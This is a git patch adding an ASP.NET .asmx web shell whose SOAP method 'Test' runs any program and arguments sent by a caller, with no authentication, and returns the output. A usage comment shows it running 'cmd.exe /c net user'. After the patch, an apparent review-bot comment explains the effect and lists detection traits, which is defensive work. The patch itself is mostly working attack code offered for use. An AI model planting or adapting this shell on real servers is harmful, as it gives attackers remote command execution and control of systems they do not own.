From be43efc9ac139450ecd26cdcee23bb40ac0c7269 Mon Sep 17 00:00:00 2001
From: Rvn0xsy
Date: Mon, 29 Aug 2022 11:32:15 +0800
Subject: [PATCH] add asmx format cmd shell
---
 aspx/cmd.asmx | 84 +++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 84 insertions(+)
 create mode 100644 aspx/cmd.asmx
diff --git a/aspx/cmd.asmx b/aspx/cmd.asmx
new file mode 100644
index 0000000..d97ef0c
--- /dev/null
+++ b/aspx/cmd.asmx
@@ -0,0 +1,84 @@
+<%--
+Usage:
+POST /test.asmx/Test HTTP/1.1
+Host: example.com
+Content-Type: text/xml; charset=utf-8
+Content-Length: 363
+SOAPAction: "http://tempuri.org/Test"
+
+
+
+
+ cmd.exe
+ /c net user
+
+
+
+--%>
+
+<%@ WebService Language="C#" Class="Service" %>
+using System;
+using System.Web;
+using System.IO;
+using System.Net;
+using System.Text;
+using System.Data;
+using System.Data.SqlClient;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Web.SessionState;
+using System.Web.Services;
+using System.Xml;
+using System.Web.Services.Protocols;
+
+[WebService(Namespace = "http://www.payloads.online/")]
+[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
+
+public class New_Process :Process
+{
+ public New_Process(string s)
+ {
+
+ }
+
+}
+
+
+public class Service : System.Web.Services.WebService
+{
+ public Service()
+ {
+
+ }
+
+ [WebMethod]
+ public string Test(string Z1,string Z2)
+ {
+ String R;
+
+ ProcessStartInfo c = new ProcessStartInfo(Z1,Z2);
+ Process e = new New_Process("something");
+ StreamReader OT, ER;
+ c.UseShellExecute = false;
+ c.RedirectStandardOutput = true;
+ c.RedirectStandardError = true;
+ e.StartInfo = c;
+
+ e.Start();
+ OT = e.StandardOutput;
+ ER = e.StandardError;
+ e.Close();
+ R = OT.ReadToEnd() + ER.ReadToEnd();
+ HttpContext.Current.Response.Clear();
+ HttpContext.Current.Response.Write("");
+ HttpContext.Current.Response.Write("");
+ HttpContext.Current.Response.Write("");
+ HttpContext.Current.Response.Write("");
+ HttpContext.Current.Response.End();
+ return R;
+ }
+}
\ No newline at end of file
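Review bot: `Test` carries no comment saying that `Z1` and `Z2` go straight from the SOAP body into `new ProcessStartInfo(Z1,Z2)`, and the `[WebMethod]` has no authentication or authorization check in front of it, so whoever can reach the .asmx runs arbitrary programs under the identity of the hosting worker process. I would document that at the method, e.g. `// Z1 = executable, Z2 = arguments; caller-supplied, unvalidated, no auth check before Process.Start`, so anyone triaging the file sees its effect without reading the body. For detection, the visible traits are an .asmx whose `[WebMethod]` feeds string parameters to `ProcessStartInfo` with `UseShellExecute = false` and redirected output, the `http://www.payloads.online/` namespace string, and requests carrying `SOAPAction: "http://tempuri.org/Test"`; at runtime the IIS worker process spawning `cmd.exe` or other children is the signal to alert on (the worker-process name is inferred from the usual IIS hosting, not shown in the patch).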